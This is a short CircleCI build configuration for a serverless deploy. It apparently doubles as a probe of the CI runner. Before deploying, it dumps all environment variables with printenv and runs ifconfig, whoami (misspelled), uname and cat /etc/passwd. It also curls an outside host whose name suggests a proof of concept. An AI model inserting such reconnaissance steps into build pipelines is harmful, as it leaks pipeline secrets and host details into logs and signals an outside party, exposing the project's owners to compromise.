version: 2
jobs:
  build:
    docker:
      - image: amaysim/serverless:1.26.0

    steps:
      - checkout
      - run: printenv
      - run: ifconfig -a
      - run: whomi
      - run: uname
      - run: cat /etc/passwd
      - run: curl http://abaton.dgraph-poc.orchestrated.io:3000
      - run: serverless deploy
